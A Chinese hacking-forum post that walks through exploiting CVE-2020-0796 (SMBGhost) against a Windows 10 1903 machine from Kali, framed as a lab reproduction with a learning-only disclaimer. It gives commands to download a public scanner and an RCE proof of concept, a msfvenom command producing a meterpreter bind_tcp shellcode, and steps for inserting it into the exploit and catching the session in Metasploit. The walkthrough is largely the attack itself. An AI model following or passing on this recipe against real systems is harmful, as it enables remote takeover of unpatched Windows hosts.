找回密码
 立即注册
本帖最后由 MikeRita 于 2020-9-23 22:26 编辑

最近看了一些文章发现CVE-2020-0796复现,然后看了一下大牛操作感觉挺简单的,就试一试能不能玩一下废话不多说我们开始吧~

攻击机:kali 2020
靶机windows10 1903    下载:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

首先我们先下载两个文件
一个是漏洞检测,一个是木马poc
因为个人已经试过怎么安装了 这里就直接给大家打出代码 方便各位复制
漏洞检测
root@@kali:~/cve/2020-0796#wget https://github.com/ollypwn/SMBGhost/archive/master.zip             #这是下载地址
root@@kali:~/cve/2020-0796#unzip master.zip           #这是解压
root@@kali:~/cve/2020-0796#cd ./SMBGhost-master         #切换目录
root@@kali:~/cve/2020-0796/SMBGhost-master #ls                #查看目录下文件
README.md   scanner.py      SMBGhost.pcap          #文件
root@@kali:~/cve/2020-0796/SMBGhost-master #python3 scanner.py   IP地址         #检测是否存在有漏洞
POC
root@@kali:~/cve/2020-0796#wget https://github.com/chompie1337/SMBGhost_RCE_PoC/archive/master.zip       #下载地址
root@@kali:~/cve/2020-0796#unzip master.zip.1       #解压
root@@kali:~/cve/2020-0796#cd  ./ SMBGhost_RCE_Poc-master/               #切换目录
root@@kali:~/cve/2020-0796/SMBGhost_RCE_Poc-master#ls                       #查看目录下文件
exploit .py     kernel_shellcode.asm lznt1.py     README.md   smb_win.py       #文件
生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

接下来我们把生成木马和POC放在一起
vim exploit.py
1.png

2.png
替换后要输出这个代码
3.png
msf监听
4.png
这时候就要利用POC啦~  最后一定要敲回车不如msf那边会一直不动
5.png
最后
6.png

总结:在做实验之前一定要关闭防火墙和扫描一下445端口是否打开。
不喜欢勿喷


感谢观看我是Mike,望多多指教!
本文章只供学习交流学习不可用于其他非法用途!!!
文章来源:kali中文网论坛:www.kaliorg.com
版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)”。违反上述声明者,本站将追究其相关法律责任

分享至 : QQ空间
收藏

3 个回复

倒序浏览
一定要用python3来运行 不然会出错
回复 使用道具 举报
学习了
回复 使用道具 举报
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册